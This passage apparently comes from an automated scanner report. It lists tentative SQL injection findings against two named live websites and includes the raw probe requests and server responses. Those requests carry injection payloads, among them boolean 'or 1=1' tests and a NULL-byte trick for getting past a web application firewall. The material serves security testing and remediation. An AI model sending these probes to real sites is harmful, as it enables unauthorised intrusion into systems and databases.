Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=94873494588,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.5. http://www.mcafeestore.com/store/mfe/en_GB/pd/productID.208082000 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/pd/productID.208082000

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723128,0)
Content-Length: 32159
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<span class="dr_error" id="qty_error_span">
...[SNIP]...
.getElementById('quantity');
// Returns true when the quantity is a positive integer
function validQty(qty) {
return /^[1-9]\d*$/.test(qty);
}
// Switch the class when the quantity is invalid
function setQtyFocus() {
if (!validQty(qtyField.value)) {
qtyField.className = ErrorFocusClassName;
}
}
// Resets the quantity field class when the user tabs off the field

...[SNIP]...

Request 2

GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=208082000
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=64808723471,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.6. http://www.mcafeestore.com/store/mfe/en_GB/pd/productID.237091200 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/pd/productID.237091200

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859050158,0)
Content-Length: 31552
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<span class="dr_error" id="qty_error_span">
...[SNIP]...
.getElementById('quantity');
// Returns true when the quantity is a positive integer
function validQty(qty) {
return /^[1-9]\d*$/.test(qty);
}
// Switch the class when the quantity is invalid
function setQtyFocus() {
if (!validQty(qtyField.value)) {
qtyField.className = ErrorFocusClassName;
}
}
// Resets the quantity field class when the user tabs off the field

...[SNIP]...

Request 2

GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=103463429157,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.7. http://www.pcaholic.com/wp-content/plugins/contact-form-7/jquery.form.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/jquery.form.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13737313%20or%201%3d1--%20 and 13737313%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Jquery Form Js?113737313%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/j
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d80c2-6883-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 26755
Vary: User-Agent
Connection: close
Content-Type: application/javascript

/*!
* jQuery Form Plugin
* version: 2.83 (11-JUL-2011)
* @requires jQuery v1.3.2 or later
*
* Examples and documentation at: http://malsup.com/jquery/form/
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*/
;(function($) {

/*
   Usage Note:
   -----------
   Do not use both ajaxSubmit and ajaxForm on the same form. These
   functions are intended to be exclusive. Use ajaxSubmit if you want
   to bind your own submit handler to the form. For example,

   $(document).ready(function() {
       $('#myForm').bind('submit', function(e) {
           e.preventDefault(); // <-- important
           $(this).ajaxSubmit({
               target: '#output'
           });
       });
   });

   Use ajaxForm when you want the plugin to manage all the event binding
   for you. For example,

   $(document).ready(function() {
       $('#myForm').ajaxForm({
           target: '#output'
       });
   });

   When using ajaxForm, the ajaxSubmit function will be invoked for you
   at the appropriate time.
*/

/**
* ajaxSubmit() provides a mechanism for immediately submitting
* an HTML form using AJAX.
*/
$.fn.ajaxSubmit = function(options) {
   // fast fail if nothing selected (http://dev.jquery.com/ticket/2752)
   if (!this.length) {
       log('ajaxSubmit: skipping submit process - no element selected');
       return this;
   }
   
   var method, action, url, $form = this;

   if (typeof options == 'function') {
       options = { success: options };
   }

   method = this.attr('method');
   action = this.attr('action');
   url = (typeof action === 'string') ? $.trim(action) : '';
   url = url || window.location.href || '';
   if (url)
...[SNIP]...

1.8. http://www.pcaholic.com/wp-content/plugins/contact-form-7/scripts.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10647341%20or%201%3d1--%20 and 10647341%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:38 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Scripts Js?110647341%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jq
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d8138-16aa-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 5802
Vary: User-Agent
Connection: close
Content-Type: application/javascript

(function($) {

   $(function() {
       try {
           if (typeof _wpcf7 == 'undefined' || _wpcf7 === null)
               _wpcf7 = {};

           _wpcf7 = $.extend({ cached: 0 }, _wpcf7);

           $('div.wpcf7 > form').ajaxForm({
               beforeSubmit: function(formData, jqForm, options) {
                   jqForm.wpcf7ClearResponseOutput();
                   jqForm.find('img.ajax-loader').css({ visibility: 'visible' });
                   return true;
               },
               beforeSerialize: function(jqForm, options) {
                   jqForm.find('.wpcf7-use-title-as-watermark.watermark').each(function(i, n) {
                       $(n).val('');
                   });
                   return true;
               },
               data: { '_wpcf7_is_ajax_call': 1 },
               dataType: 'json',
               success: function(data) {
                   var ro = $(data.into).find('div.wpcf7-response-output');
                   $(data.into).wpcf7ClearResponseOutput();

                   if (data.invalids) {
                       $.each(data.invalids, function(i, n) {
                           $(data.into).find(n.into).wpcf7NotValidTip(n.message);
                       });
                       ro.addClass('wpcf7-validation-errors');
                   }

                   if (data.captcha)
                       $(data.into).wpcf7RefillCaptcha(data.captcha);

                   if (data.quiz)
                       $(data.into).wpcf7RefillQuiz(data.quiz);

                   if (1 == data.spam)
                       ro.addClass('wpcf7-spam-blocked');

                   if (1 == data.mailSent) {
                       $(data.into).find('form').resetForm().clearForm();
                       ro.addClass('wpcf7-mail-sent-ok');

                       if (data.onSentOk)
                           $.each(data.onSentOk, function(i, n) { eval(n) });
                   } else {
                       ro.addClass('wpcf7-mail-sent-ng');
                   }

                   if (data.onSubmit)
                       $.each(data.onSubmit, function(i, n) { eval(n) });

                   $(data.into).find('.wpcf7-use
...[SNIP]...

1.9. http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 33260542%20or%201%3d1--%20 and 33260542%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:35 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Styles Css?133260542%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jq
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d80c6-3b7-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 951
Vary: User-Agent
Connection: close
Content-Type: text/css

div.wpcf7 {
   margin: 0;
   padding: 0;
}

div.wpcf7-response-output {
   margin: 2em 0.5em 1em;
   padding: 0.2em 1em;
}

div.wpcf7-mail-sent-ok {
   border: 2px solid #398f14;
}

div.wpcf7-mail-sent-ng {
   border: 2px solid #ff0000;
}

div.wpcf7-spam-blocked {
   border: 2px solid #ffa500;
}

div.wpcf7-validation-errors {
   border: 2px solid #f7e700;
}

span.wpcf7-form-control-wrap {
   position: relative;
}

span.wpcf7-not-valid-tip {
   position: absolute;
   top: 20%;
   left: 20%;
   z-index: 100;
   background: #fff;
   border: 1px solid #ff0000;
   font-size: 10pt;
   width: 280px;
   padding: 2px;
}

span.wpcf7-not-valid-tip-no-ajax {
   color: #f00;
   font-size: 10pt;
   display: block;
}

span.wpcf7-list-item {
   margin-left: 0.5em;
}

.wpcf7-display-none {
   display: none;
}

div.wpcf7 img.ajax-loader {
   border: none;
   vertical-align: middle;
   margin-left: 4px;
}

div.wpcf7 .watermark {
   color: #888;
}

1.10. http://www.pcaholic.com/wp-content/plugins/sociable/addtofavorites.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 89917484%20or%201%3d1--%20 and 89917484%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Sociable Addtofavorites Js?189917484%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/j
...[SNIP]...

Request 2

GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Mar 2011 16:11:29 GMT
ETag: "25d855c-23c-49ec407d4ae40"
Accept-Ranges: bytes
Content-Length: 572
Vary: User-Agent
Connection: close
Content-Type: application/javascript

function AddToFavorites()
{
var title = document.title; var url = location.href;
if (window.sidebar) // Firefox
window.sidebar.addPanel(title, url, '');
else if(window.opera && window.print) // Opera
{
var elem = document.createElement('a');
elem.setAttribute('href',url);
elem.setAttribute('title',title);
elem.setAttribute('rel','sidebar'); // required to work in opera 7+
elem.click();
}
else if(document.all) // IE
window.external.AddFavorite(url, title);
}

1.11. http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14496072%20or%201%3d1--%20 and 14496072%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:37 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Sociable Sociable Css?114496072%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery
...[SNIP]...

Request 2

GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Mar 2011 16:11:29 GMT
